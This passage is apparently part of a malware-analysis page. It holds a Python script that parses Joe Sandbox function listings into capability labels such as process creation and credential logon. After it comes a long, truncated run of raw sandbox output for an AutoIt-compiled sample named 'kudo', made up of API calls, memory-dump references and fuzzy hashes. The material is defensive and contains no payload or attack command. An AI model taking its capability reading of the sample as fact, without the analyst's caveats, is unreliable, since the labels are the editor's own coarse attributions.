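APIs each function reaches (directly or via a listed subcall) onto coarse
capabilities. Labels and indicator tables are the editor's own.
"""
import re
from collections import defaultdict

# Constructed sample: six entries copied from this page, with the repeated
# "Memory Dump Source" / "Joe Sandbox IDA Plugin" blocks removed.
SAMPLE_REPORT = """\
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0082A15A
• UnhandledExceptionFilter.KERNEL32(?), ref: 0082A163
Similarity
• API ID: ExceptionFilterUnhandled
• Opcode ID: 1865c2b6b6885eeb055e851f0a0b15573c89aba65cde44db68e6a83db117d6b0
• Instruction Fuzzy Hash: 0FB09231254308ABCA002B99EC09B883F68FB46AA2F404020F70D84262CB6258508B91
Strings
• Variable must be of type 'Object'., xrefs: 00843E62
Similarity
• String ID: Variable must be of type 'Object'.
• Instruction Fuzzy Hash: 2BA2D074A00219CFCB64CF58C880AAEB7B2FF58314F248869E905EB391D775ED42CB91
APIs
• __time64.LIBCMT ref: 0086889B
  • Part of subcall function 0082520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00868F6E,00000000,?,?,?,?,0086911F,00000000,?), ref: 00825213
  • Part of subcall function 0082520A: __aulldiv.LIBCMT ref: 00825233
• Instruction Fuzzy Hash: 0F21AF32625610CFC729CF29D841A52B3E1FBA5311B698F7CE1F9CB2C0DA34A905CB54
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00864C4A
• Instruction Fuzzy Hash: 7AD09EA516561D79ED1C07649E1FFBE1148F341796FD6B1497601CA2C2ECA05C446131
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00858389), ref: 008587D1
• Instruction Fuzzy Hash: 9AD09E3226490EAFEF019EA8DD05EAE3B69FB04B01F408511FE15D51A1C775D935AB60
APIs
• NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0083B9BC,?,?,?,?,?,?), ref: 0088C934
  • Part of subcall function 0088B635: _memset.LIBCMT ref: 0088B644
  • Part of subcall function 0088B635: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008C6F20,008C6F64), ref: 0088B682
  • Part of subcall function 0088B635: CloseHandle.KERNEL32 ref: 0088B694
"""

# One API line: optional subcall prefix, Name.MODULE, optional (args), ref: addr
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s+)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
# One string xref line from a "Strings" block
STR_RE = re.compile(r"^\s*•\s+(?P<text>.+?), xrefs: (?P<ref>[0-9A-F]{8})\s*$")
# The Instruction Fuzzy Hash line closes a function entry in this layout
END_RE = re.compile(r"^\s*•\s+Instruction Fuzzy Hash:")

CAPABILITIES = {  # editor's coarse labels, assumed for this example
    "CreateProcessW": "process creation",
    "LogonUserW": "logon with supplied credentials",
    "mouse_event": "synthetic mouse input",
    "SetUnhandledExceptionFilter": "top-level exception handler",
    "UnhandledExceptionFilter": "top-level exception handler",
    "GetSystemTimeAsFileTime": "system time query",
    "NtdllDialogWndProc_W": "dialog window procedure",
}
STRING_INDICATORS = {  # AutoIt3 runtime error text (editor's attribution)
    "Variable must be of type 'Object'.": "AutoIt3 runtime error string",
}


def parse_entries(text):
    """Split the listing into function entries. Each entry is identified by
    the ref of its first direct (non-subcall) API call or string xref."""
    entries, cur = [], None
    for line in text.splitlines():
        if cur is None:
            cur = {"id": None, "apis": [], "strings": []}
        if (m := API_RE.match(line)):
            cur["apis"].append({"name": m["name"], "module": m["module"],
                                "ref": m["ref"], "via": m["sub"]})
            if cur["id"] is None and m["sub"] is None:
                cur["id"] = m["ref"]
        elif (m := STR_RE.match(line)):
            cur["strings"].append((m["text"], m["ref"]))
            cur["id"] = cur["id"] or m["ref"]
        elif END_RE.match(line):
            entries.append(cur)
            cur = None
    if cur and (cur["apis"] or cur["strings"]):  # listing cut off mid-entry
        entries.append(cur)
    return entries


def triage(text):
    """Capability -> sorted ids of functions reaching it, directly or via subcall."""
    caps = defaultdict(set)
    for e in parse_entries(text):
        for api in e["apis"]:
            if api["name"] in CAPABILITIES:
                caps[CAPABILITIES[api["name"]]].add(e["id"])
        for s, _ in e["strings"]:
            if s in STRING_INDICATORS:
                caps[STRING_INDICATORS[s]].add(e["id"])
    return {k: sorted(v) for k, v in caps.items()}


def callers_of(text, api_name):
    """(function id, intermediate subcall or None) for each reach of api_name."""
    return [(e["id"], a["via"]) for e in parse_entries(text)
            for a in e["apis"] if a["name"] == api_name]


if __name__ == "__main__":
    for cap, ids in triage(SAMPLE_REPORT).items():
        print(f"{cap:35s} {', '.join(ids)}")
    print("CreateProcessW reached from:", callers_of(SAMPLE_REPORT, "CreateProcessW"))
```

To use it on a full report, save the function listing as text and pass it to `triage`; the regexes assume the "•" bullets and "ref:" suffix exactly as rendered here, so a differently exported report needs the patterns adjusted. The `via` field is what makes the CreateProcessW hit useful: it shows the call sits behind subcall 0088B635 rather than in the dialog procedure itself, which is the address to open first in the dump.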
                                                      APIs
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0083B9BC,?,?,?,?,?,?), ref: 0088C934
                                                        • Part of subcall function 0088B635: _memset.LIBCMT ref: 0088B644
                                                        • Part of subcall function 0088B635: _memset.LIBCMT ref: 0088B653
                                                        • Part of subcall function 0088B635: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008C6F20,008C6F64), ref: 0088B682
                                                        • Part of subcall function 0088B635: CloseHandle.KERNEL32 ref: 0088B694
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                      • String ID:
                                                      • API String ID: 2364484715-0
                                                      • Opcode ID: 876122166914ec3bbd417660ba43985c52a16eb97cdea8e737fc70dd40e848df
                                                      • Instruction ID: 19c1f0b9b60c5b5b6b5a344ac575c881cbc176042dddac2ffbcd82e84de93efe
                                                      • Opcode Fuzzy Hash: 876122166914ec3bbd417660ba43985c52a16eb97cdea8e737fc70dd40e848df
                                                      • Instruction Fuzzy Hash: 0EE0B635110209EFCB11EF58DD55E963BB5FB1C315F018065FA15972B2C731A960EF61
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00801AEE,?,?,?), ref: 008016AB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogLongNtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 2065330234-0
                                                      • Opcode ID: d86569f4c9e5e306c0298f34b02aadcec4415492ee194f6f423bcedca5632a1c
                                                      • Instruction ID: 1bf3b5d8898f214395dd8609514ea0165633f5c343014c1e8a7c05b56e56c8ae
                                                      • Opcode Fuzzy Hash: d86569f4c9e5e306c0298f34b02aadcec4415492ee194f6f423bcedca5632a1c
                                                      • Instruction Fuzzy Hash: 1BE0EC35100208FBCF55AF94DC15E653B26FB58310F508428FA554A2A2CA73A561EB51
                                                      APIs
                                                      • NtdllDialogWndProc_W.NTDLL ref: 0088C8B4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogNtdllProc_
                                                      • String ID:
                                                      • API String ID: 3239928679-0
                                                      • Opcode ID: 4e517733c880f4eb6e9d549b1f3344ba499ac88f8b515d4eedc838d241408733
                                                      • Instruction ID: c3c24d6326fdc92ca8bc9c04706c419bb2e14403d84a148d8909d2076c4d9dcf
                                                      • Opcode Fuzzy Hash: 4e517733c880f4eb6e9d549b1f3344ba499ac88f8b515d4eedc838d241408733
                                                      • Instruction Fuzzy Hash: 58E04275250249EFDB01DF88D945D963BA5FB1D700F414064FA1547362C771A870EBA1
                                                      APIs
                                                      • NtdllDialogWndProc_W.NTDLL ref: 0088C885
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogNtdllProc_
                                                      • String ID:
                                                      • API String ID: 3239928679-0
                                                      • Opcode ID: 3d4cbdf6ad675b01827847ce2e357f10e4179454f0d10b04b825e9ad1b01b843
                                                      • Instruction ID: dff6b62bf61ffd509caff0501cd7b429a9d89bc3791d2f76f986ceb5f93efc6d
                                                      • Opcode Fuzzy Hash: 3d4cbdf6ad675b01827847ce2e357f10e4179454f0d10b04b825e9ad1b01b843
                                                      • Instruction Fuzzy Hash: 59E04275254249EFDB01DF88D885E963BA5FB1D700F014064FA1557362C771A870EB61
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                        • Part of subcall function 0080201B: DestroyWindow.USER32(?), ref: 008020D3
                                                        • Part of subcall function 0080201B: KillTimer.USER32(-00000001,?), ref: 0080216E
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00801AE2,?,?), ref: 008016D4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                      • String ID:
                                                      • API String ID: 2797419724-0
                                                      • Opcode ID: 8d49625c977931a8aea278a6438da5b5f7c335ed339767232afbb588ae69705c
                                                      • Instruction ID: 4ec4ce629e341127faaf0c6f2886b192886069f7c7979ca700b91a0c865f8ab5
                                                      • Opcode Fuzzy Hash: 8d49625c977931a8aea278a6438da5b5f7c335ed339767232afbb588ae69705c
                                                      • Instruction Fuzzy Hash: C0D01230140308BBDE206B94DC1FF5A3A19FB14750F408020BB04A91D3CAB2A860A659
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0082A12A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 97be839f424218e1c5c5697cf51a1c44676807e49b7681417ca2770efe9fe015
                                                      • Instruction ID: da90b7ffd56ed18129fa560e5e5cdae7a42c1aaa3bcc267af6b2aaa776e17240
                                                      • Opcode Fuzzy Hash: 97be839f424218e1c5c5697cf51a1c44676807e49b7681417ca2770efe9fe015
                                                      • Instruction Fuzzy Hash: 48A0113000020CAB8A002B8AEC08888BFACEA022A0B008020FA0C802228B32A8208B80
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4f7c1f7b2e5de85e70df3942a08eccc2ba1a15d657bf5ea74e98e247c05dcb8
                                                      • Instruction ID: 45d18ce5f16396cb5c5d947efa14de7ae5c7ecc4b82ee05a821c0a648e9e7a3a
                                                      • Opcode Fuzzy Hash: a4f7c1f7b2e5de85e70df3942a08eccc2ba1a15d657bf5ea74e98e247c05dcb8
                                                      • Instruction Fuzzy Hash: 83224630A0451ACBDF388B28C4A67FC7BA5FF01359F28816AD946CB592DB749DC5C742
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction ID: eaacf1e410b5ce23c5026f84466e5de60622095387f9b9fe8f19119b298087ea
                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction Fuzzy Hash: 36C187322051B349DF6D8639A43803EFAA1FEA27B131A076DD4B3DB1D4EE14D9A5D720
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction ID: 73e029442c172ec833e3237daaa3a99f019494d539b9711260ba586e6fa6bb74
                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction Fuzzy Hash: 57C173322091B35ADF2D463A943453EBAA1BFA27B131B076DD4B3DB1D4EE10C9A5D720
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction ID: 35bd88bce62c4b1c9f16d98c6b408087df70ab4c1f32d6e858b07ec27f47e969
                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction Fuzzy Hash: 34C184362451B349DF2D4639A47813EBAA1EEB27B132B076DD4B3CB1D4EE20C9A5D710
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction ID: 1dfe054331182be8e1126c112f0a80349dd7567a2537835fb503f45708bb491f
                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction Fuzzy Hash: 0741B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 0087785B
                                                      • DeleteObject.GDI32(00000000), ref: 0087786D
                                                      • DestroyWindow.USER32 ref: 0087787B
                                                      • GetDesktopWindow.USER32 ref: 00877895
                                                      • GetWindowRect.USER32(00000000), ref: 0087789C
                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008779DD
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008779ED
                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877A35
                                                      • GetClientRect.USER32(00000000,?), ref: 00877A41
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00877A7B
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00877A9D
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877AB0
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00877ABB
                                                      • GlobalLock.KERNEL32(00000000), ref: 00877AC4
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000), ref: 00877AD3
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00877ADC
                                                      • CloseHandle.KERNEL32(00000000), ref: 00877AE3
                                                      • GlobalFree.KERNEL32(00000000), ref: 00877AEE
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000), ref: 00877B00
                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00892CAC,00000000), ref: 00877B16
                                                      • GlobalFree.KERNEL32(00000000), ref: 00877B26
                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00877B4C
                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00877B6B
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020), ref: 00877B8D
                                                      • ShowWindow.USER32(00000004), ref: 00877D7A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: c6216a575e1039007140d7829e1c8260ec2476315e499cf79509be90d651b6c5
                                                      • Instruction ID: fe812de1bd21e56385c8ff6f504be847134bb8fc5f4aae791159a64445f9ea3b
                                                      • Opcode Fuzzy Hash: c6216a575e1039007140d7829e1c8260ec2476315e499cf79509be90d651b6c5
                                                      • Instruction Fuzzy Hash: 1E023B71900115AFDB14DFA8DC89EAE7BB9FB48310F148169F919EB2A2D734ED41CB60
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00883627
                                                      • IsWindowVisible.USER32(?), ref: 0088364B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
